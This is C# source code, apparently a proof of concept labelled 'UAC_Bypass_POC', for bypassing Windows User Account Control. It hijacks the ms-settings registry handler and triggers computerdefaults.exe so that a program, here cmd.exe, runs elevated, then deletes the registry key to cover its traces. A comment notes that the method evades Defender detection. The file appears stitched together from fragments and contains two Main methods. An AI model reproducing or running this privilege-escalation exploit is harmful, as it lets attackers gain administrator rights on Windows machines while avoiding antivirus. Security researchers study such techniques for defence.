public static void UAC()
{
WindowsPrincipal windowsPrincipal = new WindowsPrincipal(WindowsIdentity.GetCurrent());
if (!windowsPrincipal.IsInRole(WindowsBuiltInRole.Administrator))
{
Bypass.Z("Classes");
Bypass.Z("Classes\\ms-settings");
Bypass.Z("Classes\\ms-settings\\shell");
Bypass.Z("Classes\\ms-settings\\shell\\open");
RegistryKey registryKey = Bypass.Z("Classes\\ms-settings\\shell\\open\\command");
string cpath = System.Reflection.Assembly.GetExecutingAssembly().Location;
registryKey.SetValue("", cpath, RegistryValueKind.String);
registryKey.SetValue("DelegateExecute", 0, RegistryValueKind.DWord);
registryKey.Close();
try
{
Process.Start(new ProcessStartInfo
{
CreateNoWindow = true,
UseShellExecute = false,
FileName = "cmd.exe",
Arguments = "/c start computerdefaults.exe"
});
}
catch { }
Process.GetCurrentProcess().Kill();
}
else
{
RegistryKey registryKey2 = Bypass.Z("Classes\\ms-settings\\shell\\open\\command");
registryKey2.SetValue("", "", RegistryValueKind.String);
}
}
static void Main()
{
try
{
if (!IsAdministrator())
{
DialogResult result = MessageBox.Show("Process is not elevated want to exploit?", "UAC_Bypass_POC", MessageBoxButtons.YesNoCancel);
if (result == DialogResult.Yes)
{
Bypass.UAC();
}
else if (result == DialogResult.Cancel)
{
Environment.Exit(0);
}
else if (result == DialogResult.No)
{
Environment.Exit(0);
}
}
else if (IsAdministrator())
{
string command = "/c start cmd.exe "; //once elevated what to run.
Process.Start("CMD.exe", command);
RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
uac_clean.DeleteSubKeyTree("shell");
uac_clean.Close();
System.Windows.Forms.MessageBox.Show("Process Elevated!");
}
}catch { Environment.Exit(0); }
}
public static RegistryKey Z(string x)
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\" + x, true);
bool flag = !Bypass.checksubkey(registryKey);
if (flag)
{
registryKey = Registry.CurrentUser.CreateSubKey("Software\\" + x);
}
return(registryKey);
}
static void Main()
{
try
{
if (!IsAdministrator())
{
Bypass.UAC();
}
else if (IsAdministrator())
{
//this method seems to bypass defender
//5-02-2021 and binary is not flagged
string WhatToElevate = "cmd.exe"; // cmd.exe will be elevated as an example and PoC
Process.Start("CMD.exe", "/c start " + WhatToElevate);
RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
uac_clean.DeleteSubKeyTree("shell"); //deleting this is important because if we won't delete that right click of windows will break.
uac_clean.Close();
}
}catch { Environment.Exit(0); }
}
public static string GetOsVer()
{
string result;
try
{
ManagementObject mngObj = Bypass.GetMngObj("Win32_OperatingSystem");
bool flag = mngObj == null;
if (flag)
{
result = string.Empty;
}
else
{
result = (mngObj["Version"] as string);
}
}
catch (Exception ex)
{
result = string.Empty;
}
return(result);
}
